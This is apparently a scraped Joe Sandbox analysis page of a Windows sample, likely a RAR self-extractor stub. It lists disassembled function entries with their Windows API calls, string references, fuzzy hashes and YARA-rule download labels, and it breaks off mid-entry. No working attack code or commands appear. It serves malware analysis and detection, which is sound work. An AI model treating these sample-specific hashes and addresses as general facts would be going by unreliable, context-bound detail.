Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: ce36c2bdced0572971d3510ce8a746f79be722d3d9a362c2ef109fd01856d211
Instruction ID: 0f81cc843c1ead3ecbcd162d295228820076fc7e3ac7cabe454932a61884368b
Opcode Fuzzy Hash: ce36c2bdced0572971d3510ce8a746f79be722d3d9a362c2ef109fd01856d211
Instruction Fuzzy Hash: DAF03C72A01219BBCF30ABA5EC4CEDB7FADEF45791B008125B50AE2050D6788646CBB0

Function 007CA80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 007CA699: GetDC.USER32(00000000), ref: 007CA69D
Part of subcall function 007CA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 007CA6A8
Part of subcall function 007CA699: ReleaseDC.USER32(00000000,00000000), ref: 007CA6B3

GetObjectW.GDI32(?,00000018,?), ref: 007CA83C

Part of subcall function 007CAAC9: GetDC.USER32(00000000), ref: 007CAAD2
Part of subcall function 007CAAC9: GetObjectW.GDI32(?,00000018,?), ref: 007CAB01
Part of subcall function 007CAAC9: ReleaseDC.USER32(00000000,?), ref: 007CAB99

Strings

"|, xrefs: 007CA89D, 007CAAB9
(, xrefs: 007CA9AA
A|, xrefs: 007CA9BA

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: "|$($A|
API String ID: 1061551593-2008921735
Opcode ID: 5b244bc7aac2fc4d946acff53d2dee4b3d26ccb6f8ca1570373a5c29ed6706d6
Instruction ID: 79eaa8610b3590ae67efaa9592fd162e9f4648f4a08efa7fba36b352a61dbdc0
Opcode Fuzzy Hash: 5b244bc7aac2fc4d946acff53d2dee4b3d26ccb6f8ca1570373a5c29ed6706d6
Instruction Fuzzy Hash: A591E171608754AFD610DF25C888E2BBBE8FFC8715F00891EF59AD7260DB34A945CB62

Function 007BC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 007C05DA: _wcslen.LIBCMT ref: 007C05E0

Part of subcall function 007BB92D: _wcsrchr.LIBVCRUNTIME ref: 007BB944

_wcslen.LIBCMT ref: 007BC197
_wcslen.LIBCMT ref: 007BC1DF

Strings

.exe, xrefs: 007BC10B
.rar, xrefs: 007BC0E1, 007BC134
.sfx, xrefs: 007BC11A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 1e3b1f8b2258b207fc757b537da8ba9a1980511b504a902f5c63e55e06963b95
Instruction ID: 80bc2b6db7e95f050fa01df3b2036b4f975adafa5fc8f11250b39b662774949f
Opcode Fuzzy Hash: 1e3b1f8b2258b207fc757b537da8ba9a1980511b504a902f5c63e55e06963b95
Instruction Fuzzy Hash: 1F412861500399D6C733AF38884AFFB73A8EF45704F14854EF991AB182EB5C5D81C391

Function 007BBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007BBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,007BA275,?,?,00000800,?,007BA23A,?,007B755C), ref: 007BBBC5
_wcslen.LIBCMT ref: 007BBC3B

Strings

UNC, xrefs: 007BBBA7
\\?\, xrefs: 007BBB52, 007BBB99, 007BBBF7, 007BBC4E

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 85e90e9224342f6d620638e3f446c39bd06103a8b0b7a4078bddc449586d56ba
Instruction ID: 35ad0b8ef7a81fadbb4d61d73704a906638d3830ef4d59f5ae0520d85c9e5242
Opcode Fuzzy Hash: 85e90e9224342f6d620638e3f446c39bd06103a8b0b7a4078bddc449586d56ba
Instruction Fuzzy Hash: 4841A071400255F6CB21EF20CC49FEB7BA9AF45394F10446AFD54A3151EBBCEA908AB0

Function 007CCD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 007CCD84

Part of subcall function 007CAF98: _wcschr.LIBVCRUNTIME ref: 007CB033

Part of subcall function 007C1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007BC116,00000000,.exe,?,?,00000800,?,?,?,007C8E3C), ref: 007C1FD1

Strings

MAX, xrefs: 007CCDD9
<, xrefs: 007CCD68
HIDE, xrefs: 007CCDC6
MIN, xrefs: 007CCDF5

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: 500236e40ec11b7150558f44b2bb1fe3f7bb98220d2444be34a5ad86b7167ed2
Instruction ID: c38b6a2a701b36e23e686f508bc7ce6f475e30f0c8df8dd150019b5b69e20ca9
Opcode Fuzzy Hash: 500236e40ec11b7150558f44b2bb1fe3f7bb98220d2444be34a5ad86b7167ed2
Instruction Fuzzy Hash: 22316571900259AADF26DB64CC45FEE73BCEB15354F40416EE905E7180EBB8DE848FA1

Function 007CAAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007CAAD2
GetObjectW.GDI32(?,00000018,?), ref: 007CAB01
ReleaseDC.USER32(00000000,?), ref: 007CAB99

Strings

-|, xrefs: 007CAB32, 007CAB3F, 007CAB73, 007CAB7F
7|, xrefs: 007CAB67

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ObjectRelease
String ID: -|$7|
API String ID: 1429681911-3598349746
Opcode ID: e70fa25b49fb49e9958295fbda6e5c161220808ed773b7c65a542ff0ab1e5ad3
Instruction ID: 14b69373a4fe81ebe2c47145312a798f0940de3b4cd3e1d7f03fa9a021a1ba26
Opcode Fuzzy Hash: e70fa25b49fb49e9958295fbda6e5c161220808ed773b7c65a542ff0ab1e5ad3
Instruction Fuzzy Hash: 1821E9B2108704AFD7019FA5EC48EAFBFFDFF8D355F054829FA4692120D6319A548B62

Function 007BB991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007BB9B8

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

_wcschr.LIBVCRUNTIME ref: 007BB9D6
_wcschr.LIBVCRUNTIME ref: 007BB9E6

Strings

%c:\, xrefs: 007BB9AE

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 65a9a17520dc9cd53b2b5ed65a851cfa3a7ed18cab8d36ecd3aa10808589b289
Instruction ID: 24243a65141475d233346c9071ec56770c9e3c1461349b04f9875e4ebed7e1ac
Opcode Fuzzy Hash: 65a9a17520dc9cd53b2b5ed65a851cfa3a7ed18cab8d36ecd3aa10808589b289
Instruction Fuzzy Hash: 0401F963500311A59630AB358C89EABA7ACEE96770B40841BF944D7182EB78E44183B1

Function 007CB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 007CB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 007CB712
DeleteObject.GDI32(00000000), ref: 007CB744
DeleteObject.GDI32(00000000), ref: 007CB767

Part of subcall function 007CA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,007CB73D,00000066), ref: 007CA6D5
Part of subcall function 007CA6C2: SizeofResource.KERNEL32(00000000,?,?,?,007CB73D,00000066), ref: 007CA6EC
Part of subcall function 007CA6C2: LoadResource.KERNEL32(00000000,?,?,?,007CB73D,00000066), ref: 007CA703
Part of subcall function 007CA6C2: LockResource.KERNEL32(00000000,?,?,?,007CB73D,00000066), ref: 007CA712
Part of subcall function 007CA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007CB73D,00000066), ref: 007CA72D
Part of subcall function 007CA6C2: GlobalLock.KERNEL32(00000000), ref: 007CA73E
Part of subcall function 007CA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 007CA762
Part of subcall function 007CA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007CA7A7
Part of subcall function 007CA6C2: GlobalUnlock.KERNEL32(00000000), ref: 007CA7C6
Part of subcall function 007CA6C2: GlobalFree.KERNEL32(00000000), ref: 007CA7CD

Strings

], xrefs: 007CB71A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: a65561a5fac647b85fa52884d599b5ccccf1db011e24807cd1a2ff681a1e49a7
Instruction ID: 2bf0edf8026516406645cfadd8050de868229b4fd4047208e12b02501d313c3b
Opcode Fuzzy Hash: a65561a5fac647b85fa52884d599b5ccccf1db011e24807cd1a2ff681a1e49a7
Instruction Fuzzy Hash: 4201AD36500609B7C71267749C0EFAB7BBDAFC4B5AF09401EBD00B7291DF298D0546A2

Function 007CD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 007B1316: GetDlgItem.USER32(00000000,00003021), ref: 007B135A
Part of subcall function 007B1316: SetWindowTextW.USER32(00000000,007E35F4), ref: 007B1370

EndDialog.USER32(?,00000001), ref: 007CD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 007CD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 007CD675
SetDlgItemTextW.USER32(?,00000068), ref: 007CD684

Strings

RENAMEDLG, xrefs: 007CD618

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: f37d2118bc86710d22378da0d97d18569f6f4a7ea786e11a186eb6c9fa380bf1
Instruction ID: bf2296ed2db819049c35b3a8fd36e88117cb029fe01bf09355b689e5b5c5d294
Opcode Fuzzy Hash: f37d2118bc86710d22378da0d97d18569f6f4a7ea786e11a186eb6c9fa380bf1
Instruction Fuzzy Hash: EC01F533244314BAE2308F649D09FAA779CBB5AB41F01402CF305B2091C7AA9E04CB65

Function 007D7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007D7E24,00000000,?,007D7DC4,00000000,007EC300,0000000C,007D7F1B,00000000,00000002), ref: 007D7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007D7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,007D7E24,00000000,?,007D7DC4,00000000,007EC300,0000000C,007D7F1B,00000000,00000002), ref: 007D7EC9

Strings

CorExitProcess, xrefs: 007D7E9E
mscoree.dll, xrefs: 007D7E8C

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 757b33de2c26117cc3548975d1657eba500edf9f9bd3ade3f5f7d5f871b2720b
Instruction ID: 9b8109b345f882e43da01e547e7c16db3151cdf2ee352e05c157579e96368aaf
Opcode Fuzzy Hash: 757b33de2c26117cc3548975d1657eba500edf9f9bd3ade3f5f7d5f871b2720b
Instruction Fuzzy Hash: 70F06871901248BBDB159FA5DC4DB9EBFB9EF48751F0081A9F805AB250DB389F40CB94

Function 007BF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 007C081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007C0836
Part of subcall function 007C081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007BF2D8,Crypt32.dll,00000000,007BF35C,?,?,007BF33E,?,?,?), ref: 007C0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007BF2E4
GetProcAddress.KERNEL32(007F81C8,CryptUnprotectMemory), ref: 007BF2F4

Strings

Crypt32.dll, xrefs: 007BF2CE
CryptUnprotectMemory, xrefs: 007BF2EA
CryptProtectMemory, xrefs: 007BF2DE

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: efe7091910afc7684e2775574e9ee5f4f0501f6e7e39f82c57e88878365779ea
Instruction ID: f285cfb8d21111539e6c4c6a22727647e81ed8bf50d9a1b213f21e88440457fa
Opcode Fuzzy Hash: efe7091910afc7684e2775574e9ee5f4f0501f6e7e39f82c57e88878365779ea
Instruction Fuzzy Hash: 0BE086B09127819EC7209F399C4DB417BD46F0CB00F14C86DF0DA93650D6BCD5808B90

Function 007D2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 007D2CA1
___AdjustPointer.LIBCMT ref: 007D2CC4
_abort.LIBCMT ref: 007D2D12
___AdjustPointer.LIBCMT ref: 007D2D60

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 41e9a0eab9eea11a92eadb3241071c1b0c1bbfc6aad76b2ae22b0ec86586606a
Instruction ID: 209082653744cb8a8ab93c194dfb9ac2e03634a07f28d7a038549fdeb37a76e9
Opcode Fuzzy Hash: 41e9a0eab9eea11a92eadb3241071c1b0c1bbfc6aad76b2ae22b0ec86586606a
Instruction Fuzzy Hash: C551C171601212AFDB298F24D949BAA73B6FF64310F24452FE805573A2D739ED43D7A0

Function 007DBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 007DBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007DBF5C

Part of subcall function 007D8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007DCA2C,00000000,?,007D6CBE,?,00000008,?,007D91E0,?,?,?), ref: 007D8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007DBF82
_free.LIBCMT ref: 007DBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007DBFA4

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f3f3f963ea9d38d36f14b30423ee88ac5077e5ece778e4e53cdd0e47cac804b9
Instruction ID: 5f2c26387011eaad08cd4fbcb0f76cc53e407e964d7fadc6476ab306a9493a8e
Opcode Fuzzy Hash: f3f3f963ea9d38d36f14b30423ee88ac5077e5ece778e4e53cdd0e47cac804b9
Instruction Fuzzy Hash: AE01B162602615BFA721177A5C8DC7F6A7DDECABA0316412EF904C7340EF688D0185B0

Function 007D9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,007F1030,00000200,007D91AD,007D617E,?,?,?,?,007BD984,?,?,?,00000004,007BD710,?), ref: 007D986E
_free.LIBCMT ref: 007D98A3
_free.LIBCMT ref: 007D98CA
SetLastError.KERNEL32(00000000,007E3A34,00000050,007F1030), ref: 007D98D7
SetLastError.KERNEL32(00000000,007E3A34,00000050,007F1030), ref: 007D98E0

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 12f406bbc273fc787b21af826bcd7a2e511f243c8d8142cf261f7695fc791ba9
Instruction ID: 9e451735b07b44430389baff2982446781d084fbf986104d975de924b6f4ffc5
Opcode Fuzzy Hash: 12f406bbc273fc787b21af826bcd7a2e511f243c8d8142cf261f7695fc791ba9
Instruction Fuzzy Hash: 14014432205701BBC3122324ACCD91B263AEFCAB747240137F6119B392FE3C8C01A265

Function 007C0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 007C11CF: ResetEvent.KERNEL32(?), ref: 007C11E1
Part of subcall function 007C11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 007C11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 007C0F21
CloseHandle.KERNEL32(?,?), ref: 007C0F3B
DeleteCriticalSection.KERNEL32(?), ref: 007C0F54
CloseHandle.KERNEL32(?), ref: 007C0F60
CloseHandle.KERNEL32(?), ref: 007C0F6C

Part of subcall function 007C0FE4: WaitForSingleObject.KERNEL32(?,000000FF,007C1206,?), ref: 007C0FEA
Part of subcall function 007C0FE4: GetLastError.KERNEL32(?), ref: 007C0FF6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 9c9808f4b0358403fe5c142814f3dc7051f6528846b215077b802d6878c15a77
Instruction ID: 8e3e6f5b244146b61e762281681d43496f1a626758dcb3f94dc97f355e69d93d
Opcode Fuzzy Hash: 9c9808f4b0358403fe5c142814f3dc7051f6528846b215077b802d6878c15a77
Instruction Fuzzy Hash: 4F015E72101784EFC7229B64DC88FD6BBAAFB08710F00496DF26A92161CB797A45CA94

Function 007DC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007DC817

Part of subcall function 007D8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34), ref: 007D8DE2
